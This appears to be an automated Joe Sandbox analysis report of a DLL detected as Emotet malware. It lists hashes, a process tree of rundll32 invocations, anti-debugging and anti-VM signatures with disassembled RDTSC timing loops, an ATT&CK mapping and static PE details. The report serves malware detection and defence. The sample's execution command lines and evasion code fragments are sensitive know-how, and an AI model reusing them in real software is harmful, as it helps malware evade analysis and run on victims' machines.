Windows Analysis Report K5hW6I5xeA

Overview

General Information

Sample Name:K5hW6I5xeA (renamed file extension from none to dll)
Analysis ID:531949
MD5:d89375ecbc2638d71f6cc446947adb71
SHA1:d9cd4340910bd1dd2f3d576fd7ea5fdfd6671060
SHA256:e523b545ce399ceb37ba1fb400ba5e7a285e6d4c1e3ae5bbd5607ce538b64ac7
Tags:32, dll, exe, trojan

Detection

Emotet
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Emotet
Multi AV Scanner detection for submitted file
Tries to detect virtualization through RDTSC time measurements
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)
Contains functionality for execution timing, often used to detect debuggers

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6692 cmdline: loaddll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 4592 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5880 cmdline: rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4344 cmdline: rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6376 cmdline: rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6752 cmdline: rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |

Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 9.2.rundll32.exe.4d30000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 9.2.rundll32.exe.4d30000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |
| 9.2.rundll32.exe.4d30000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 9.2.rundll32.exe.4d30000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              AV Detection:

              Multi AV Scanner detection for submitted file
              Source: K5hW6I5xeA.dll | Virustotal: Detection: 28%
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA52300 CryptDecrypt,CryptSetKeyParam,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,VirtualAlloc
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA54940 CryptAcquireContextA
              Source: K5hW6I5xeA.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: K5hW6I5xeA.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA57045 FindFirstFileExA
              Source: loaddll32.exe, 00000002.00000002.836708742.0000000000F7B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud:

              Yara detected Emotet
              Source: Yara match | File source: 9.2.rundll32.exe.4d30000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 9.2.rundll32.exe.4d30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, type: MEMORY
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA52300 CryptDecrypt,CryptSetKeyParam,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,VirtualAlloc
              Source: K5hW6I5xeA.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA52A10
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA5C678
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA51000
              Source: K5hW6I5xeA.dll | Virustotal: Detection: 28%
              Source: K5hW6I5xeA.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL
              Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll"
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju
              Source: classification engine | Classification label: mal68.troj.evad.winDLL@11/0@0/0
              Source: K5hW6I5xeA.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: K5hW6I5xeA.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: K5hW6I5xeA.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: K5hW6I5xeA.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: K5hW6I5xeA.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: K5hW6I5xeA.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA53C66 push ecx; ret 2_2_6EA53C79
              Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 000000006EA525AA second address: 000000006EA525B9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+60h], 00000000h 0x0000000b mov dword ptr [esp+60h], ecx 0x0000000f rdtscp
              Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 000000006EA525B9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+5Ch], 00000000h 0x0000000b mov dword ptr [esp+5Ch], ecx 0x0000000f nop dword ptr [eax+eax+00000000h] 0x00000017 inc esi 0x00000018 mov dword ptr [esp+64h], 00000000h 0x00000020 rdtscp
              Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 000000006EA525D9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+64h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007F4D65053704h 0x00000015 inc esi 0x00000016 mov dword ptr [esp+64h], 00000000h 0x0000001e rdtscp
              Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 000000006EA525D9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+64h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007F4D6476A404h 0x00000015 inc esi 0x00000016 mov dword ptr [esp+64h], 00000000h 0x0000001e rdtscp
              Source: C:\Windows\System32\loaddll32.exe | RDTSC instruction interceptor: First address: 000000006EA525AA second address: 000000006EA525B9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+60h], 00000000h 0x0000000b mov dword ptr [esp+60h], ecx 0x0000000f rdtscp
              Source: C:\Windows\System32\loaddll32.exe | RDTSC instruction interceptor: First address: 000000006EA525B9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+5Ch], 00000000h 0x0000000b mov dword ptr [esp+5Ch], ecx 0x0000000f nop dword ptr [eax+eax+00000000h] 0x00000017 inc esi 0x00000018 mov dword ptr [esp+64h], 00000000h 0x00000020 rdtscp
              Source: C:\Windows\System32\loaddll32.exe | RDTSC instruction interceptor: First address: 000000006EA525D9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+64h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007F4D65053704h 0x00000015 inc esi 0x00000016 mov dword ptr [esp+64h], 00000000h 0x0000001e rdtscp
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA52570 rdtscp
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA57045 FindFirstFileExA
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA53A9C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA56AEE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA528D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA52DF0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA55900 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA5817A GetProcessHeap
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA56B21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA535A6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
              Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
              Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Progman
              Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA53C7C cpuid
              Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6EA536C7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

              Stealing of Sensitive Information:

              Yara detected Emotet
              Source: Yara match | File source: 9.2.rundll32.exe.4d30000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 9.2.rundll32.exe.4d30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 12 | Rundll32 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1 |
              | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 12 | LSASS Memory | Security Software Discovery 13 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
              | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
              | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
              | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |

              Behavior Graph

              [Behavior graph, ID: 531949, Sample: K5hW6I5xeA, Startdate: 01/12/2021, Architecture: WINDOWS, Score: 68. loaddll32.exe started three rundll32.exe processes and cmd.exe; cmd.exe started a further rundll32.exe. Signatures shown: Multi AV Scanner detection for submitted file; Yara detected Emotet; Tries to detect virtualization through RDTSC time measurements (on loaddll32.exe and on one rundll32.exe).]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              | Source | Detection | Scanner | Label |
              |---|---|---|---|
              | K5hW6I5xeA.dll | 28% | Virustotal | |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              | Source | Detection | Scanner | Label |
              |---|---|---|---|
              | 9.2.rundll32.exe.4d30000.0.unpack | 100% | Avira | HEUR/AGEN.1110387 |

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:531949
              Start date:01.12.2021
              Start time:15:23:16
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 17s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:K5hW6I5xeA (renamed file extension from none to dll)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:17
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal68.troj.evad.winDLL@11/0@0/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 100% (good quality ratio 89.5%)
              • Quality average: 75.8%
              • Quality standard deviation: 32.9%
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Override analysis time to 240s for rundll32
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.673697209310638
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:K5hW6I5xeA.dll
              File size:273920
              MD5:d89375ecbc2638d71f6cc446947adb71
              SHA1:d9cd4340910bd1dd2f3d576fd7ea5fdfd6671060
              SHA256:e523b545ce399ceb37ba1fb400ba5e7a285e6d4c1e3ae5bbd5607ce538b64ac7
              SHA512:46a132edd6e8765b11d14a2dd995617fcffe04c081a028b7339f06db7653ec2ea91870fc123bc21cab39c84bbecf70c6a08a6e1e72705835697790a813773ba0
              SSDEEP:6144:I+/WjBDXCrZukVAAYCcVwnmU3PbnvOWRPyrLzP:lWGACc2PlRKrLzP
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.`d9..79..79..7J..63..7J..6...7J..6+..7k..6%..7k..66..7k..6+..7J..6:..79..7k..7...60..7...68..7...78..7...68..7Rich9..7.......

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x10003583
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x10000000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x61A7688F [Wed Dec 1 12:20:31 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:3bc41ab907dcf32970630360a7a2019f

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              cmp dword ptr [ebp+0Ch], 01h
              jne 00007F4D64AB75D7h
              call 00007F4D64AB7758h
              push dword ptr [ebp+10h]
              push dword ptr [ebp+0Ch]
              push dword ptr [ebp+08h]
              call 00007F4D64AB7488h
              add esp, 0Ch
              pop ebp
              retn 000Ch
              push ebp
              mov ebp, esp
              push 00000000h
              call dword ptr [1000E00Ch]
              push dword ptr [ebp+08h]
              call dword ptr [1000E008h]
              push C0000409h
              call dword ptr [1000E010h]
              push eax
              call dword ptr [1000E014h]
              pop ebp
              ret
              push ebp
              mov ebp, esp
              sub esp, 00000324h
              push 00000017h
              call 00007F4D64AC0C36h
              test eax, eax
              je 00007F4D64AB75D7h
              push 00000002h
              pop ecx
              int 29h
              mov dword ptr [10043868h], eax
              mov dword ptr [10043864h], ecx
              mov dword ptr [10043860h], edx
              mov dword ptr [1004385Ch], ebx
              mov dword ptr [10043858h], esi
              mov dword ptr [10043854h], edi
              mov word ptr [10043880h], ss
              mov word ptr [10043874h], cs
              mov word ptr [10043850h], ds
              mov word ptr [1004384Ch], es
              mov word ptr [10043848h], fs
              mov word ptr [10043844h], gs
              pushfd
              pop dword ptr [10043878h]
              mov eax, dword ptr [ebp+00h]
              mov dword ptr [1004386Ch], eax
              mov eax, dword ptr [ebp+04h]
              mov dword ptr [10043870h], eax

              Data Directories

              | Name | Virtual Address | Virtual Size | Is in Section |
              |---|---|---|---|
              | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x42400 | 0x17c | .rdata |
              | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4257c | 0x28 | .rdata |
              | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0xf8 | .rsrc |
              | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0xea4 | .reloc |
              | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x41f80 | 0x40 | .rdata |
              | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_IAT | 0xe000 | 0x104 | .rdata |
              | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

              Sections

              | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
              |---|---|---|---|---|---|---|---|---|
              | .text | 0x1000 | 0xc387 | 0xc400 | False | 0.582011320153 | data | 6.66250995052 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
              | .rdata | 0xe000 | 0x34b56 | 0x34c00 | False | 0.730320645735 | data | 6.21371435728 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
              | .data | 0x43000 | 0x30d0 | 0x800 | False | 0.16357421875 | data | 2.04808247088 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
              | .rsrc | 0x47000 | 0xf8 | 0x200 | False | 0.3359375 | data | 2.52739185048 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
              | .reloc | 0x48000 | 0xea4 | 0x1000 | False | 0.763671875 | data | 6.28630296444 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

              Resources

              | Name | RVA | Size | Type | Language | Country |
              |---|---|---|---|---|---|
              | RT_MANIFEST | 0x47060 | 0x91 | XML 1.0 document text | English | United States |

              Imports

              | DLL | Import |
              |---|---|
              | KERNEL32.dll | GetProcessHeap, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer |

              Exports

              | Name | Ordinal | Address |
              |---|---|---|
              | Control_RunDLL | 1 | 0x10002540 |
              | ewjabexomfikq | 2 | 0x10002810 |
              | fkehpgdsrju | 3 | 0x10002890 |
              | hccjznkicyecp | 4 | 0x10002860 |
              | hdekbiavwfv | 5 | 0x100028a0 |
              | jhvbaqehqk | 6 | 0x10002880 |
              | neqhjiziu | 7 | 0x10002850 |
              | nlrehsflisyuqnf | 8 | 0x10002830 |
              | qgtkxvadqyopue | 9 | 0x10002820 |
              | rawlhsccualjvyace | 10 | 0x100028b0 |
              | tjyttnnknxvspvdyq | 11 | 0x100028c0 |
              | useprszs | 12 | 0x10002840 |
              | wjainmjvfb | 13 | 0x10002800 |
              | wrenlws | 14 | 0x10002870 |

              Possible Origin

              | Language of compilation system | Country where language is spoken |
              |---|---|
              | English | United States |

              Network Behavior

              No network behavior found

              Code Manipulations

              System Behavior

              General

              Start time:15:24:09
              Start date:01/12/2021
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll"
              Imagebase:0x240000
              File size:893440 bytes
              MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:15:24:09
              Start date:01/12/2021
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
              Imagebase:0xd80000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:15:24:10
              Start date:01/12/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL
              Imagebase:0x80000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:15:24:10
              Start date:01/12/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
              Imagebase:0x80000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:15:24:14
              Start date:01/12/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq
              Imagebase:0x80000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:15:24:18
              Start date:01/12/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju
              Imagebase:0x80000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:high

              Disassembly

              Code Analysis


                Executed Functions

                C-Code - Quality: 73%
                			E6EA52A10() {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				char _v24;
                				intOrPtr _v28;
